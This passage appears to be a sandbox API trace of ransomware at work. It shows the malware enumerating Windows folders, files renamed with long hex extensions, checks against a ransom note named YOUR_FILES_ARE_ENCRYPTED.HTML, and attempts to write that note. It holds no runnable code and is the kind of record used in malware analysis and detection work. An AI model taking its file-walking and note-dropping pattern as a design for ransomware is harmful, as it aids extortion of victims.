Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned 185 [0169.636] lstrcmpW (lpString1="C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW 
(pszPath="C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned=".CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B" [0169.636] lstrlenW (lpString=".CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb8de6e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x12d6e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556", cAlternateFileName="C2RMAN~1.6F2")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned 204 [0169.636] lstrcmpW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned=".6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556" [0169.636] lstrlenW (lpString=".6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb904840, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3708, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48", cAlternateFileName="C2RMAN~1.679")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned 189 [0169.636] lstrcmpW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned=".679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48" [0169.636] lstrlenW (lpString=".679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb950b00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xaac34, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837", cAlternateFileName="C2RMAN~1.9CC")) returned 1 [0169.636] wnsprintfW 
(in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned 198 [0169.636] lstrcmpW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned=".9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837" [0169.636] lstrlenW (lpString=".9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c34470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c34470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb976c60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x15286, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569", cAlternateFileName="C2RMAN~1.AD9")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned 194 [0169.636] lstrcmpW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0169.637] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned=".AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569" [0169.637] lstrlenW (lpString=".AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb99cdc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1301e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141", cAlternateFileName="C2RMAN~1.49A")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned 184 [0169.637] lstrcmpW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned=".49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141" [0169.637] lstrlenW (lpString=".49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, 
ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77a3b990, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x0, dwReserved1=0x60, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 97 [0169.637] lstrcmpW (lpString1="integrator.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0169.637] lstrlenW (lpString=".exe") returned 4 [0169.637] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91a13d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91a13d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xcb9c2f20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853", cAlternateFileName="MICROS~1.93D")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned 201 [0169.637] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned=".93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853" [0169.637] lstrlenW (lpString=".93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91126ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91126ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xca6, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E", cAlternateFileName="MICROS~1.096")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned 198 [0169.637] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned=".0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E" [0169.637] lstrlenW (lpString=".0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95bd5cf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x95bd5cf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa8ea310, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0x0, dwReserved1=0x60, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 102 [0169.637] lstrcmpW (lpString1="msoutilstat.etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0169.638] lstrlenW (lpString=".man") returned 4 [0169.638] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0169.638] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x949fb7f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x949fb7f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac1041d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x0, dwReserved1=0x60, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0169.638] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 94 [0169.638] lstrcmpW (lpString1="wordEtw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.638] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0169.638] lstrlenW (lpString=".man") returned 4 [0169.638] PathFindExtensionW 
(pszPath="wordEtw.man") returned=".man" [0169.638] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb9e9080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.638] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0169.638] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.638] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb9e9080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.638] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.638] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0169.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 
users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.638] GetProcessHeap () returned 0x270000 [0169.639] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.639] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0169.639] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.639] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.639] GetProcessHeap () returned 0x270000 [0169.640] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.645] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Crypto", cAlternateFileName="")) returned 1 [0169.645] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned 39 [0169.645] GetProcessHeap () returned 0x270000 [0169.645] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.646] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" [0169.646] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*" [0169.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.781] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.781] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DSS", cAlternateFileName="")) returned 1 [0169.781] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 43 [0169.781] GetProcessHeap () returned 0x270000 [0169.781] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.784] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" [0169.784] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*" [0169.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f31c0 [0169.784] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.785] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0169.785] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 55 [0169.785] GetProcessHeap () returned 0x270000 [0169.785] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.786] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0169.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All 